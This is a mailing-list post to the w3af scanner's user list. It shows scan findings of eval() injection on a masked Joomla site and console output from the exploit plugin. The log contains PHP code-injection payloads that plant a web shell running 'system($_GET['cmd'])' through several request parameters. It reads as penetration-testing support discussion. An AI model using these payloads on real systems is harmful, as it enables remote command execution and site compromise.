*This is what I get when I am scanning:*
eval() input injection was found at: "http://www.*.*.*.*/index.php", using
HTTP method GET. The sent data was: "format=echo+'hwlGz'+.+'hmyxk'%3B". This
vulnerability was found in the request with id 3503.

GET http://www.*.*.*.*/index.php?format=echo+'hwlGz'+.+'hmyxk'%3B HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
Host: www.*.*.*.*
Referer: http:www.*.*.*.*/
Cookie: path=/, ja_sanidineii_light_tpl=ja_sanidineii_light; path=/;
expires=Mon, 22-Aug-2011 05:15:31 GMT;
d78b7e97c61f57a1bb044966cb321828=662af586260d792ccc6ccc092b6e2815;
*and:*

eval() input injection was found at: "http://www.*.*.*.*/component/search/",
using HTTP method POST. The sent post-data was:
"ordering=newest&task=search&areas%5B%5D=content&searchword=Hello+World&searchphrase=Response.Write("hwlGz%2Bhmyxk")".
The modified parameter was "searchphrase". This vulnerability was found in
the request with id 3837.

GET 
http://www.*.*.*.*/component/search/?ordering=newest&areas%5B0%5D=content&searchword=Hello+World&searchphrase=ResponseWritehwlGzhmyxk
HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
Host: www.*.*.*.*
Referer: http://www.*.*.*.*/
Cookie: d78b7e97c61f57a1bb044966cb321828=662af586260d792ccc6ccc092b6e2815;
ja_sanidineii_light_tpl=ja_sanidineii_light
Content-type: application/x-www-form-urlencoded

*This is what I get when I exploit:*
 Checking suitability...
Ok, exploiting...
Done

 *and in the console:*

eval exploit plugin is starting.
Called buildOpeners
keepalive: The connection manager has 0 active connections.
keepalive: added one connection, len(self._hostmap["www.*.*.*.*"]): 1
Cached DNS response for domain: www.*.*.*.*
keepalive: removed one connection,  len(self._hostmap["www.*.*.*.*"]):

GET http://www.*.*.*.*/index.php?format=if+(+strcmp(+%24_GET%5B'cmd'%5D
2C+""+)+==+0+)%7B%0A++++echo+"15825b40c6dace2a"+.+"7cf5d4ab8ed434d5"%3B%0A%7Del
e%7B%0A++++system+(+%24_GET%5B'cmd'%5D+)%3B%0A%7D returned HTTP code "500" -
id
 10084
keepalive: The connection manager has 0 active connections.
keepalive: added one connection, len(self._hostmap["www.*.*.*.*"]): 1
Cached DNS response for domain: www.*.*.*.*
keepalive: The connection manager has 1 active connections.
POST http://www.*.*.*.*/component/search/ with data: "ordering=newest&t
sk=search&areas[]=content&searchword=Hello World&searchphrase=if ( strcmp(
$_GE
['cmd'], "" ) == 0 ){
    echo "15825b40c6dace2a" . "7cf5d4ab8ed434d5";
}else{
    system ( $_GET['cmd'] );
}" returned HTTP code "200" - id: 10086
keepalive: The connection manager has 1 active connections.
keepalive: The connection manager has 1 active connections.
POST http://www.*.*.*.*/component/search/ with data: "ordering=if ( str
mp( $_GET['cmd'], "" ) == 0 ){
    echo "15825b40c6dace2a" . "7cf5d4ab8ed434d5";
}else{
    system ( $_GET['cmd'] );
}&task=search&areas[]=content&searchword=Hello World&searchphrase=all"
returned
HTTP code "200" - id: 10088
keepalive: The connection manager has 1 active connections.
keepalive: The connection manager has 1 active connections.
POST http://www.*.*.*.*/component/search/ with data: "ordering=newest&t
sk=search&areas[]=if ( strcmp( $_GET['cmd'], "" ) == 0 ){
    echo "15825b40c6dace2a" . "7cf5d4ab8ed434d5";
}else{
    system ( $_GET['cmd'] );
}&searchword=Hello World&searchphrase=all" returned HTTP code "200" - id:
10090

Thanks
_______________________________________________
W3af-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/w3af-users
